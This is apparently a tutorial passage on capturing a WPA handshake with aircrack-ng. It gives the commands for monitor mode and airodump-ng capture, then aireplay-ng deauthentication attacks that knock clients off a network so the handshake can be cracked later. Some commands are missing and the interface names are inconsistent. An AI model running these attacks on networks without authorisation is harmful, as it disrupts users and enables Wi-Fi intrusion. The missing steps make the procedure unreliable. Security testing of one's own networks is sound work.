Start monitor mode
Boot up Kali Linux. Go to the terminal to begin running the aircrack-ng tool suite. Put your wifi adapter into monitor mode.
airmon-ng start wlan0
Where wlan0 is the name of your interface card. Check this by running,
When connected to a wireless network. There may be processes that interfere with starting monitor mode. The program will inform you if there might be issues. Or run,
airmon-ng check kill
Start monitoring the frequencies
Start monitoring the radio frequencies around you by running,
Where wlan1mon is your renamed wifi adapter. Check this again by running,
Select a channel
Select a channel, your own or someone else’s if you have permission,
airodump-ng -c [channel] --bssid [mac-address of interface] wlan0mon -w [newFile]
Insert your chosen channel and MAC address in place of the bracketed text. The -w option saves the capture for later analysis. Replace [newFile] with the file name you would like to use. The files are saved in the directory you started the terminal in.
Disconnect all clients
Now check whether you can disconnect clients, forcing them to re-authenticate.
aireplay-ng -0 0 -a [bssid] wlan0mon
Insert the MAC address of the broadcasting interface again. The beacons indicator will drop to 0, try to increase and then drop again. You will be looking for the message in the top right corner,
WPA handshake: 12:34:56:78:90:AB
Not successful? Sometimes it depends on the clients connected. Or, you may need to disconnect a specific client. In that case issue,
aireplay-ng -0 0 -a [bssid] -c [mac-target address] wlan0mon
You should now have a .cap file containing the hashed four-way handshake. The next article will discuss using the aircrack-ng suite again to see if it can be cracked.